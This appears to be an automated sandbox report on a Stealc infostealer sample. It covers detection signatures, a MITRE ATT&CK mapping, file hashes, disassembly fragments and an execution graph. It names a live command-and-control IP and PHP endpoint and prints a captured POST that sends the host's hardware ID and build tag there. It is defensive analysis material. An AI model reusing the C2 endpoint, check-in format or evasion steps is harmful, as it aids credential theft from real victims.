Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E598E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle, 0_2_00E598E0
Source: file.exe, file.exe, 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: rProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E875A8 cpuid 0_2_00E875A8
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00E57D20
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E56BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00E56BC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E579E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00E579E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E57BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00E57BC0

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2053306343.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5248, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2053306343.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5248, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (one tactic per column; a leading number is the count of matching signatures in this analysis)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 651 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 334 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
http://185.215.113.206/6c4adf523b719729.php | 17% | Virustotal | |
http://185.215.113.206/6c4adf523b719729.php. | 16% | Virustotal | |
http://185.215.113.206/6c4adf523b719729.php/ | 18% | Virustotal | |
http://185.215.113.206/ | 19% | Virustotal | |
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php | true | | unknown
http://185.215.113.206/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php. | file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/m | file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/6c4adf523b719729.phpZ | file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpj | file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/ws | file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2053306343.0000000004F6B000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1544273
Start date and time: 2024-10-29 07:53:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 132
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
                          No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.206 | file.exe | Get hash | malicious | Stealc, Vidar | Browse
• 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc | Browse
• 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Quasar, Stealc | Browse
• 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc, Vidar | Browse
• 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc | Browse
• 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc, Vidar | Browse
• 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc | Browse
• 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc, Vidar | Browse
• 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc | Browse
• 185.215.113.206/6c4adf523b719729.php
file.exe | Get hash | malicious | Stealc, Vidar | Browse
• 185.215.113.206/6c4adf523b719729.php
                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse
• 185.215.113.206
file.exe | Get hash | malicious | LummaC | Browse
• 185.215.113.16
file.exe | Get hash | malicious | LummaC | Browse
• 185.215.113.16
file.exe | Get hash | malicious | Stealc | Browse
• 185.215.113.206
file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Quasar, Stealc | Browse
• 185.215.113.16
file.exe | Get hash | malicious | Stealc, Vidar | Browse
• 185.215.113.206
file.exe | Get hash | malicious | LummaC | Browse
• 185.215.113.16
file.exe | Get hash | malicious | Stealc | Browse
• 185.215.113.206
file.exe | Get hash | malicious | Stealc, Vidar | Browse
• 185.215.113.206
file.exe | Get hash | malicious | LummaC | Browse
• 185.215.113.16
                          No context
                          No context
                          No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.959827929474119
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'138'112 bytes
MD5: 3bdbd89b86e70ca180f24b3acc79bc1f
SHA1: a425bb88b0b48ac5b0af08f31dfa241fcd73385b
SHA256: 13188e8c8ca814a413636036d5fda36f97b41fa969f0e2ac831312bb394cc5bc
SHA512: 9b3246b83d85ef394efece9d8f09955b21a7469b1da7069702e22a00b9c673e9e593a77c0caecd19850de38bddef94b0a54cae2bd4b3a88d336b87ee1f533be6
SSDEEP: 49152:5TrijYlI9UoFBhKq4dSCr+c9qlHs2NIQw3:l2+I9VFBhP4dsc2M2N+
TLSH: 77A5338DF774B964C35A623C06E752D33F30D069737A54B96B2AA6F02C4052DCB28B5C
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
Icon Hash: 00928e8e8686b000
Entrypoint: 0xb31000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007FC400D700BAh
                          movd dword ptr [eax], mm4
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [ebx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dl
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ebx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ebx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], cl
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | d5bf3b5d2bd2c189d122e095ed0beab2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x2a7000 | 0x200 | ee26ed98d9a54390ee290851943a3880 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fgyethhk | 0x591000 | 0x19f000 | 0x19f000 | 6d006457d122d0ab17b446864a09c816 | False | 0.994837749435241 | data | 7.9536291120516625 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cbzeryut | 0x730000 | 0x1000 | 0x400 | b7db79b05df4d09e62fccab80ac54dec | False | 0.755859375 | data | 6.052317017259871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x731000 | 0x3000 | 0x2200 | f6bdb2da0ffdd285d81ec90b7eecab4c | False | 0.060776654411764705 | DOS executable (COM) | 0.7927525394172865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-29T07:54:01.532470+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 29, 2024 07:54:00.322644949 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 29, 2024 07:54:00.328331947 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 29, 2024 07:54:00.328424931 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 29, 2024 07:54:00.337726116 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 29, 2024 07:54:00.343261957 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 29, 2024 07:54:01.240561008 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 29, 2024 07:54:01.240690947 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 29, 2024 07:54:01.243451118 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 29, 2024 07:54:01.250600100 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 29, 2024 07:54:01.532361031 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 29, 2024 07:54:01.532469988 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 29, 2024 07:54:04.349407911 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                          • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 5248 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 07:54:00.337726116 CET | 90 | OUT | GET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
Oct 29, 2024 07:54:01.240561008 CET | 203 | IN | HTTP/1.1 200 OK
                          Date: Tue, 29 Oct 2024 06:54:01 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
Oct 29, 2024 07:54:01.243451118 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----KJKJKFCBKKJDGDHIDBGI
                          Host: 185.215.113.206
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 38 44 36 30 37 39 42 41 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 2d 2d 0d 0a
                          Data Ascii: ------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="hwid"C68D6079BAE23924696330------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="build"tale------KJKJKFCBKKJDGDHIDBGI--
Oct 29, 2024 07:54:01.532361031 CET | 210 | IN | HTTP/1.1 200 OK
                          Date: Tue, 29 Oct 2024 06:54:01 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


Target ID: 0
Start time: 02:53:57
Start date: 29/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0xe40000
File size: 2'138'112 bytes
MD5 hash: 3BDBD89B86E70CA180F24B3ACC79BC1F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2053306343.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


                            Execution Graph

Execution Coverage: 3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.5%
Total number of Nodes: 1327
Total number of Limit Nodes: 24
                            execution_graph 37713 e56c90 37758 e422a0 37713->37758 37737 e56d04 37738 e5acc0 4 API calls 37737->37738 37739 e56d0b 37738->37739 37740 e5acc0 4 API calls 37739->37740 37741 e56d12 37740->37741 37742 e5acc0 4 API calls 37741->37742 37743 e56d19 37742->37743 37744 e5acc0 4 API calls 37743->37744 37745 e56d20 37744->37745 37910 e5abb0 37745->37910 37747 e56dac 37914 e56bc0 GetSystemTime 37747->37914 37749 e56d29 37749->37747 37751 e56d62 OpenEventA 37749->37751 37753 e56d95 CloseHandle Sleep 37751->37753 37754 e56d79 37751->37754 37755 e56daa 37753->37755 37757 e56d81 CreateEventA 37754->37757 37755->37749 37756 e56db6 CloseHandle ExitProcess 37757->37747 38111 e44610 37758->38111 37760 e422b4 37761 e44610 2 API calls 37760->37761 37762 e422cd 37761->37762 37763 e44610 2 API calls 37762->37763 37764 e422e6 37763->37764 37765 e44610 2 API calls 37764->37765 37766 e422ff 37765->37766 37767 e44610 2 API calls 37766->37767 37768 e42318 37767->37768 37769 e44610 2 API calls 37768->37769 37770 e42331 37769->37770 37771 e44610 2 API calls 37770->37771 37772 e4234a 37771->37772 37773 e44610 2 API calls 37772->37773 37774 e42363 37773->37774 37775 e44610 2 API calls 37774->37775 37776 e4237c 37775->37776 37777 e44610 2 API calls 37776->37777 37778 e42395 37777->37778 37779 e44610 2 API calls 37778->37779 37780 e423ae 37779->37780 37781 e44610 2 API calls 37780->37781 37782 e423c7 37781->37782 37783 e44610 2 API calls 37782->37783 37784 e423e0 37783->37784 37785 e44610 2 API calls 37784->37785 37786 e423f9 37785->37786 37787 e44610 2 API calls 37786->37787 37788 e42412 37787->37788 37789 e44610 2 API calls 37788->37789 37790 e4242b 37789->37790 37791 e44610 2 API calls 37790->37791 37792 e42444 37791->37792 37793 e44610 2 API calls 37792->37793 37794 e4245d 37793->37794 37795 e44610 2 API calls 37794->37795 37796 e42476 37795->37796 37797 e44610 2 API calls 37796->37797 37798 e4248f 37797->37798 37799 e44610 2 API calls 37798->37799 37800 e424a8 
37799->37800 37801 e44610 2 API calls 37800->37801 37802 e424c1 37801->37802 37803 e44610 2 API calls 37802->37803 37804 e424da 37803->37804 37805 e44610 2 API calls 37804->37805 37806 e424f3 37805->37806 37807 e44610 2 API calls 37806->37807 37808 e4250c 37807->37808 37809 e44610 2 API calls 37808->37809 37810 e42525 37809->37810 37811 e44610 2 API calls 37810->37811 37812 e4253e 37811->37812 37813 e44610 2 API calls 37812->37813 37814 e42557 37813->37814 37815 e44610 2 API calls 37814->37815 37816 e42570 37815->37816 37817 e44610 2 API calls 37816->37817 37818 e42589 37817->37818 37819 e44610 2 API calls 37818->37819 37820 e425a2 37819->37820 37821 e44610 2 API calls 37820->37821 37822 e425bb 37821->37822 37823 e44610 2 API calls 37822->37823 37824 e425d4 37823->37824 37825 e44610 2 API calls 37824->37825 37826 e425ed 37825->37826 37827 e44610 2 API calls 37826->37827 37828 e42606 37827->37828 37829 e44610 2 API calls 37828->37829 37830 e4261f 37829->37830 37831 e44610 2 API calls 37830->37831 37832 e42638 37831->37832 37833 e44610 2 API calls 37832->37833 37834 e42651 37833->37834 37835 e44610 2 API calls 37834->37835 37836 e4266a 37835->37836 37837 e44610 2 API calls 37836->37837 37838 e42683 37837->37838 37839 e44610 2 API calls 37838->37839 37840 e4269c 37839->37840 37841 e44610 2 API calls 37840->37841 37842 e426b5 37841->37842 37843 e44610 2 API calls 37842->37843 37844 e426ce 37843->37844 37845 e59bb0 37844->37845 38116 e59aa0 GetPEB 37845->38116 37847 e59bb8 37848 e59de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37847->37848 37849 e59bca 37847->37849 37850 e59e44 GetProcAddress 37848->37850 37851 e59e5d 37848->37851 37852 e59bdc 21 API calls 37849->37852 37850->37851 37853 e59e96 37851->37853 37854 e59e66 GetProcAddress GetProcAddress 37851->37854 37852->37848 37855 e59e9f GetProcAddress 37853->37855 37856 e59eb8 37853->37856 37854->37853 37855->37856 37857 e59ec1 GetProcAddress 37856->37857 37858 e59ed9 37856->37858 37857->37858 
37859 e56ca0 37858->37859 37860 e59ee2 GetProcAddress GetProcAddress 37858->37860 37861 e5aa50 37859->37861 37860->37859 37862 e5aa60 37861->37862 37863 e56cad 37862->37863 37864 e5aa8e lstrcpy 37862->37864 37865 e411d0 37863->37865 37864->37863 37866 e411e8 37865->37866 37867 e41217 37866->37867 37868 e4120f ExitProcess 37866->37868 37869 e41160 GetSystemInfo 37867->37869 37870 e41184 37869->37870 37871 e4117c ExitProcess 37869->37871 37872 e41110 GetCurrentProcess VirtualAllocExNuma 37870->37872 37873 e41141 ExitProcess 37872->37873 37874 e41149 37872->37874 38117 e410a0 VirtualAlloc 37874->38117 37877 e41220 38121 e58b40 37877->38121 37880 e41249 __aulldiv 37881 e4129a 37880->37881 37882 e41292 ExitProcess 37880->37882 37883 e56a10 GetUserDefaultLangID 37881->37883 37884 e56a73 37883->37884 37885 e56a32 37883->37885 37891 e41190 37884->37891 37885->37884 37886 e56a57 ExitProcess 37885->37886 37887 e56a61 ExitProcess 37885->37887 37888 e56a43 ExitProcess 37885->37888 37889 e56a4d ExitProcess 37885->37889 37890 e56a6b ExitProcess 37885->37890 37890->37884 37892 e57a70 3 API calls 37891->37892 37894 e4119e 37892->37894 37893 e411cc 37898 e579e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37893->37898 37894->37893 37895 e579e0 3 API calls 37894->37895 37896 e411b7 37895->37896 37896->37893 37897 e411c4 ExitProcess 37896->37897 37899 e56cd0 37898->37899 37900 e57a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 37899->37900 37901 e56ce3 37900->37901 37902 e5acc0 37901->37902 38123 e5aa20 37902->38123 37904 e5acd1 lstrlen 37905 e5acf0 37904->37905 37906 e5ad28 37905->37906 37908 e5ad0a lstrcpy lstrcat 